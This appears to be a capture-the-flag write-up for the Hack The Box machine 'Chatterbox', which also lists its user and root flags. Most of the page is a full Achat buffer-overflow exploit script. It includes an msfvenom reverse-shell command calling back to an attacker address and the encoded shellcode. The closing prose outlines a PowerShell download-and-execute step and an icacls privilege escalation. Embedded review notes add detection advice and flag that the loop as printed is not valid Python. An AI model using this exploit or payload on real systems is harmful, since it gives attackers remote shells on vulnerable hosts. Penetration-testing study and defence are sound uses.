Links

Chatterbox

Chatterbox - 10.10.10.74

Target Enumeration:

OS: Windows
IP: 10.10.10.74
User: 72290246dfaedb1e3e3ac9d6fb306334
Root: a673d1b1fa95c276c5ef2aa13d9dcc7c

Ports / Services / Software Versions Running

9255/tcp open mon
9256/tcp open -

Vulnerability Exploited:

Achat Remote Buffer Overflow.
https://www.exploit-db.com/exploits/36025/

Privilege Escalation:

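The current user (alfred) can run icacls against root.txt and grant itself read access, even though the file sits on the Administrator's desktop; the author notes that this allows the current user to read any file owned by the administrator. icacls can only rewrite an ACL when the caller already owns the object or holds change-permission rights on it, so the underlying weakness is an over-permissive ACL inside the Administrator's profile. That ACL is what a defender should audit and correct.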

Exploiting the host:

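Nmap took too long, so I used Sparta on this one.
It revealed ports 9255 and 9256 open. The service list above shows them as TCP, but the script below sends to 9256 over UDP, so filtering and monitoring for this service need to cover both protocols.
Googling the ports pointed to Achat.
The Metasploit module for it is really buggy, so we found a better exploit online: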
https://www.exploit-db.com/exploits/36025/
Generate your shellcode
Paste that into the script so it looks as follows:
#!/usr/bin/python
# Author KAhara MAnhara - modified
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
# NOTE(review): the size stated above does not match this listing. By count the
# rows below are 59 x 13 bytes plus a final row of 7 bytes, i.e. 774 bytes. The
# padding expression later in the script (1152 - len(buf)) uses the real length,
# so it is not affected by the stale figure in this comment.
#
# `buf` holds the encoded payload emitted by the msfvenom command in the comment
# above (x86/unicode_mixed encoder, BufferRegister=EAX). The bad-character list in
# that command excludes 0x00 and 0x80-0xff, which is consistent with every byte
# below being printable ASCII. For detection this means the payload looks like
# ordinary text on the wire, so signatures are better keyed on the message
# framing and size than on non-printable bytes.
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x47\x78\x53\x52"
buf += "\x4d\x30\x4d\x30\x59\x70\x43\x30\x45\x39\x6b\x35\x6e"
buf += "\x51\x55\x70\x71\x54\x72\x6b\x72\x30\x6c\x70\x54\x4b"
buf += "\x4f\x62\x7a\x6c\x72\x6b\x42\x32\x6e\x34\x44\x4b\x30"
buf += "\x72\x6b\x78\x6a\x6f\x37\x47\x6d\x7a\x4f\x36\x30\x31"
buf += "\x69\x6f\x66\x4c\x6f\x4c\x51\x51\x51\x6c\x59\x72\x4e"
buf += "\x4c\x6b\x70\x79\x31\x46\x6f\x4c\x4d\x49\x71\x57\x57"
buf += "\x79\x52\x39\x62\x4e\x72\x32\x37\x52\x6b\x30\x52\x4a"
buf += "\x70\x32\x6b\x4e\x6a\x4f\x4c\x72\x6b\x4e\x6c\x4b\x61"
buf += "\x71\x68\x69\x53\x6e\x68\x79\x71\x68\x51\x32\x31\x62"
buf += "\x6b\x50\x59\x6b\x70\x59\x71\x46\x73\x74\x4b\x61\x39"
buf += "\x7a\x78\x5a\x43\x6e\x5a\x6d\x79\x34\x4b\x30\x34\x74"
buf += "\x4b\x49\x71\x57\x66\x30\x31\x49\x6f\x74\x6c\x56\x61"
buf += "\x46\x6f\x6c\x4d\x59\x71\x69\x37\x4e\x58\x67\x70\x70"
buf += "\x75\x69\x66\x49\x73\x53\x4d\x39\x68\x4f\x4b\x71\x6d"
buf += "\x6b\x74\x73\x45\x37\x74\x51\x48\x54\x4b\x6f\x68\x6f"
buf += "\x34\x79\x71\x5a\x33\x32\x46\x44\x4b\x6a\x6c\x30\x4b"
buf += "\x52\x6b\x71\x48\x6d\x4c\x39\x71\x56\x73\x72\x6b\x6c"
buf += "\x44\x32\x6b\x6d\x31\x48\x50\x31\x79\x4d\x74\x6f\x34"
buf += "\x6e\x44\x4f\x6b\x31\x4b\x70\x61\x31\x49\x71\x4a\x52"
buf += "\x31\x6b\x4f\x47\x70\x51\x4f\x71\x4f\x70\x5a\x34\x4b"
buf += "\x4c\x52\x58\x6b\x72\x6d\x4f\x6d\x4f\x78\x30\x33\x50"
buf += "\x32\x79\x70\x69\x70\x53\x38\x52\x57\x73\x43\x50\x32"
buf += "\x31\x4f\x61\x44\x32\x48\x50\x4c\x30\x77\x4f\x36\x7a"
buf += "\x67\x6b\x4f\x36\x75\x36\x58\x62\x70\x49\x71\x59\x70"
buf += "\x49\x70\x6f\x39\x35\x74\x6f\x64\x32\x30\x43\x38\x4b"
buf += "\x79\x63\x50\x30\x6b\x4b\x50\x79\x6f\x48\x55\x42\x30"
buf += "\x70\x50\x42\x30\x42\x30\x51\x30\x62\x30\x61\x30\x6e"
buf += "\x70\x63\x38\x39\x5a\x7a\x6f\x79\x4f\x49\x50\x69\x6f"
buf += "\x78\x55\x45\x47\x32\x4a\x69\x75\x31\x58\x49\x7a\x4a"
buf += "\x6a\x6a\x6e\x6b\x58\x33\x38\x39\x72\x49\x70\x4a\x61"
buf += "\x65\x6b\x72\x69\x49\x56\x70\x6a\x4a\x70\x6f\x66\x51"
buf += "\x47\x70\x68\x44\x59\x46\x45\x53\x44\x43\x31\x59\x6f"
buf += "\x5a\x35\x35\x35\x59\x30\x62\x54\x6a\x6c\x49\x6f\x4e"
buf += "\x6e\x4c\x48\x44\x35\x78\x6c\x43\x38\x78\x70\x74\x75"
buf += "\x65\x52\x42\x36\x79\x6f\x79\x45\x62\x48\x30\x63\x52"
buf += "\x4d\x52\x44\x79\x70\x32\x69\x68\x63\x6f\x67\x4f\x67"
buf += "\x71\x47\x4c\x71\x7a\x56\x42\x4a\x6a\x72\x50\x59\x6e"
buf += "\x76\x49\x52\x4b\x4d\x42\x46\x35\x77\x31\x34\x6c\x64"
buf += "\x4d\x6c\x5a\x61\x6d\x31\x44\x4d\x31\x34\x4e\x44\x4a"
buf += "\x70\x76\x66\x6b\x50\x4e\x64\x51\x44\x30\x50\x6e\x76"
buf += "\x31\x46\x30\x56\x31\x36\x50\x56\x70\x4e\x50\x56\x72"
buf += "\x36\x71\x43\x51\x46\x42\x48\x43\x49\x68\x4c\x4f\x4f"
buf += "\x62\x66\x6b\x4f\x76\x75\x74\x49\x59\x50\x6e\x6e\x62"
buf += "\x36\x51\x36\x59\x6f\x30\x30\x33\x38\x79\x78\x53\x57"
buf += "\x4b\x6d\x51\x50\x4b\x4f\x78\x55\x45\x6b\x4c\x30\x76"
buf += "\x55\x35\x52\x70\x56\x62\x48\x63\x76\x34\x55\x77\x4d"
buf += "\x33\x6d\x49\x6f\x4a\x35\x4d\x6c\x4b\x56\x73\x4c\x7a"
buf += "\x6a\x53\x50\x39\x6b\x79\x50\x71\x65\x7a\x65\x67\x4b"
buf += "\x70\x47\x6d\x43\x62\x52\x32\x4f\x4f\x7a\x69\x70\x42"
buf += "\x33\x4b\x4f\x37\x65\x41\x41"
# Create a UDP socket - Change this host!!!
# Python 2 listing: it uses the `print` statement and treats str as a byte string.
# Transport is UDP (SOCK_DGRAM) to port 9256 on the lab address from the write-up.
# The port list earlier on the page shows 9255/9256 as TCP, so host firewall rules
# and network monitoring for this service should cover UDP as well.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
# `fs` is a 20-byte sequence spliced into the message below. Its role is not
# explained on this page -- presumably a small first-stage stub; confirm against
# the referenced advisory before relying on that reading.
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
# `p` is the complete message. It is built from two records that each start with
# the literal "A0000000002#Main" followed by a NUL, with very long runs of a single
# filler character ("Z" x 114688, "A" x 57288, ...). The byte layout is order- and
# length-sensitive, so the statements are left exactly as published.
# Detection angle: a chat service receiving more than 170,000 bytes of mostly one
# repeated character in a single burst is a strong anomaly on its own.
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
# The payload occupies a fixed 1152-byte slot; the remainder is filled with "A".
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
# Send loop: the message goes out in slices of at most 8192 bytes, advancing by
# the byte count sendto() reports; a one-second sleep appears once the offset
# passes 172000.
# NOTE(review): the indentation of the loop body was lost in this listing, so the
# nesting of the statements under `while` and `if` cannot be read off the page and
# the block is not valid Python as printed.
i=0
while i<len(p):
if i > 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
# The socket is closed after the loop.
sock.close()
Execute
Now you have a shell
Upgrade your shell to Meterpreter. As the target is Windows 7, we will use PowerShell to download it.
Generate a shell with msfvenom
Start your python web server and a metasploit listener
Download the file with the following commands and execute it. (The commands themselves are not reproduced on this page.)
Now you have a meterpreter shell
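Enumerating the system shows that you can access the Administrator's desktop but cannot read the file.
Use the following command to assign ownership to alfred and collect the root flag. (The command is not reproduced on this page; it is the icacls step described under Privilege Escalation above.)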